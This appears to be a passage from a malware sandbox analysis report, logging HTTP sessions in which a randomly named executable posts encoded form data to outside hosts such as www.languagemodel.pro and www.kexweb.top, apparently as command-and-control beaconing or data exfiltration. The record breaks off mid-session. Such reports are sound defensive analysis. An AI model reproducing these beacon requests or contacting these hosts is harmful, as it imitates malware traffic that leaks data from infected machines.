                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.752118217.70.184.50804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:02.053656101 CEST1874OUTPOST /nxfn/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Origin: http://www.languagemodel.pro
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.languagemodel.pro/nxfn/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 59 6a 2f 35 42 2b 57 4f 70 59 69 52 36 46 68 46 6e 50 57 55 7a 61 6a 2f 67 49 50 2f 55 31 66 4e 62 70 32 54 71 64 63 79 2b 6b 69 30 56 61 71 63 73 4c 70 58 59 41 55 5a 44 6a 56 31 4d 37 6c 75 45 55 39 74 77 6f 64 61 4a 63 72 78 63 72 53 39 4b 79 53 55 41 48 53 46 6f 4a 39 64 69 6c 4f 62 65 4a 30 57 70 68 38 6f 44 43 44 61 4f 37 61 52 2f 33 64 76 4b 6c 51 6d 54 72 71 71 51 69 54 67 34 4c 38 4c 5a 6a 74 37 55 4b 51 58 5a 45 71 6d 36 4a 71 70 7a 51 51 37 6a 38 77 74 6f 38 4b 2b 4d [TRUNCATED]
                                              Data Ascii: 7lpPGx=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Yj/5B+WOpYiR6FhFnPWUzaj/gIP/U1fNbp2Tqdcy+ki0VaqcsLpXYAUZDjV1M7luEU9twodaJcrxcrS9KySUAHSFoJ9dilObeJ0Wph8oDCDaO7aR/3dvKlQmTrqqQiTg4L8LZjt7UKQXZEqm6JqpzQQ7j8wto8K+MSqzh/lygzhKTtfMJ65QFl2r1tk+8keesun/LXud3fRomXeu/lcZ6vJZ4Gpqg8wqZnvzB2RFoOjBo0e0dOWlxb2B/+7tuoOtCKDeGiqVkfuGXzzmNgVPpEr/59voHNxV0NJEpJbBua23SS8CMAsC2zodEvyu3PY6i9JGHkIZJgxRsVvb56nOEGTkQVxBSnetD8wE35gZQjPljvEJOl54dA5XCxGeOvkHy2qJK7+GvO61npD26UGRKDqVco0CCtm39dZj/zoxqm7Dw0sjFjkj+yOWxzSn8eQgUoWnAEqkU/AUOyZxVHeVHxYUZMldgAgmQ5MQEumSrY3NLNbiTUSWW3zaBTihpsrq5uV5XJBka1TEEDaAzJKLONPNDGGXqzCb1LjJN2ZNVn/n3msSB9GLRBlSeQk82zHzN6onptYmAjYnKJ/DIBYhzUqJChCVJeYZVMFqRdp5QyRwaUK6MM10ljnUnJ4lydzgg3DcS8zbN/vDFOTyn16s/zvmpj+IUFK5GOyNOmpvfQ6qHrvPwU7enT3b0usDxDVqx67K4FTVOpWmPpDl8dTTIx/u0r5wUgvh37X5G8oO71tHo1yKQ6ESjgtX1jmVdofC2WZIWjsKjbcpZSuB9+vOSUYRBVVPF5FMY3mWkGjIIXOPxKdBJI98JPL5/xmLynDGJgR [TRUNCATED]
                                              Sep 25, 2024 11:38:02.650785923 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:38:02 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.752119217.70.184.50804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:04.594868898 CEST575OUTGET /nxfn/?QF4tL=lBP8AZrpnb&7lpPGx=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.languagemodel.pro
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:05.211067915 CEST1236INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:38:05 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Language
                                              Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                              Sep 25, 2024 11:38:05.211108923 CEST914INData Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                              Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.75212063.250.47.40804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:10.999030113 CEST820OUTPOST /3bdq/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Origin: http://www.kexweb.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.kexweb.top/3bdq/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 67 77 46 2b 4a 6d 55 76 37 69 5a 63 73 78 53 48 41 4a 4c 72 6f 6a 62 71 62 79 4b 56 72 38 6d 72 30 49 2f 46 79 4a 4f 35 4d 37 41 75 61 71 44 79 77 3d 3d
                                              Data Ascii: 7lpPGx=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqgwF+JmUv7iZcsxSHAJLrojbqbyKVr8mr0I/FyJO5M7AuaqDyw==
                                              Sep 25, 2024 11:38:11.585447073 CEST595INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:11 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.75212163.250.47.40804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:13.554080963 CEST840OUTPOST /3bdq/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Origin: http://www.kexweb.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.kexweb.top/3bdq/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 62 67 75 5a 57 38 43 4e 68 54 70 31 4d 6e 49 51 39 76 6d 37 65 71 6a 49 4c 48 6b 50 73 57 37 6e 47 6e 77 59 30 4d 59 2b 2f 6c 35 46 72 4e 56 4a 45 3d
                                              Data Ascii: 7lpPGx=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15bguZW8CNhTp1MnIQ9vm7eqjILHkPsW7nGnwY0MY+/l5FrNVJE=
                                              Sep 25, 2024 11:38:14.144331932 CEST595INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:14 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.75212263.250.47.40804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:16.105684996 CEST1853OUTPOST /3bdq/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Origin: http://www.kexweb.top
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.kexweb.top/3bdq/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 79 52 66 4f 68 70 59 54 6c 4b 67 49 62 38 79 71 32 64 4e 66 42 47 77 32 41 4d 41 79 45 49 76 4a 32 73 73 37 33 48 73 36 46 48 73 58 71 59 34 36 35 56 51 35 44 31 73 33 4b 4d 58 64 75 52 78 38 2b 58 6b 56 4b 2b 32 38 5a 73 46 63 2b 34 34 2f 44 5a 31 67 33 65 69 78 43 4b 43 68 78 72 33 67 78 2f 65 62 35 66 37 6f 45 59 50 71 51 4e 66 68 42 77 4d 36 4c 51 72 50 74 4b 61 47 64 47 6e 4d 2f 51 34 63 5a 72 4d 6c 55 59 67 58 57 34 62 66 76 67 2f 47 4e 2f 59 78 62 58 31 6b 45 4d 74 79 30 [TRUNCATED]
                                              Data Ascii: 7lpPGx=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267PibyRfOhpYTlKgIb8yq2dNfBGw2AMAyEIvJ2ss73Hs6FHsXqY465VQ5D1s3KMXduRx8+XkVK+28ZsFc+44/DZ1g3eixCKChxr3gx/eb5f7oEYPqQNfhBwM6LQrPtKaGdGnM/Q4cZrMlUYgXW4bfvg/GN/YxbX1kEMty01qsxIDS+OKENMZ97xavDtYkjIqIn96241FYVqGPNNO+dt9/1CVkKpiIwi3onLyuHbMrdseCLzyyZkkv9eQOVEGqAnPp7rdQRYEYEurFolPApcZwCRsQTC5WpOeyqFwAtnzXbLJzHsRRD1+xv2xTFIjm99W7FWPAz3s7JtHwa62gM0Xp6qehOwqXMiaqjPQ0yNdGhGs59q2l0343q2Ldmeg7S0GmqXMYujt9RndM+T3x4ZRfjSVr3KZ8JyORigimJSfo4Nyk5Wx1GOZVjduFJK5c7QPHMysRuqe2AQtBoKtYHeWkoPf4Kgpg+uxJ2SXsvl+kLw94oRKmlbyJvmlkfwRZpUVTrs7f1wUw1ytuH33U79O0p8/Av5qFlZqtVCbInRbI2ktaM43Jxw7hEI68iQTDiNtIGzYlNm4U9toyMHHgSP2V0TjmPq60NvR7q21m9Wd+LwHY0oiE+2U4qXjfeKqLMUfBJLARGAnYdqbfPolOacXAqheS06ocbhoYpDTgvvefF6SDHdgVjdXyBgpyzzRNNxLUuqI+F2+khCAJUreUtX+cfj5yI28QYze8rIFRQvcRKvdh/C6OKXWd3xSAv/p2cgGDLTKW6dJr3ASegVDrR+rU4IgCX8ES6RbqXfu7bTRBQO38McwrBQ/1TBpf3A9vzEBnRh4PI9h [TRUNCATED]
                                              Sep 25, 2024 11:38:16.688536882 CEST595INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:16 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.75212363.250.47.40804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:18.655910969 CEST568OUTGET /3bdq/?7lpPGx=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kexweb.top
                                              Connection: close
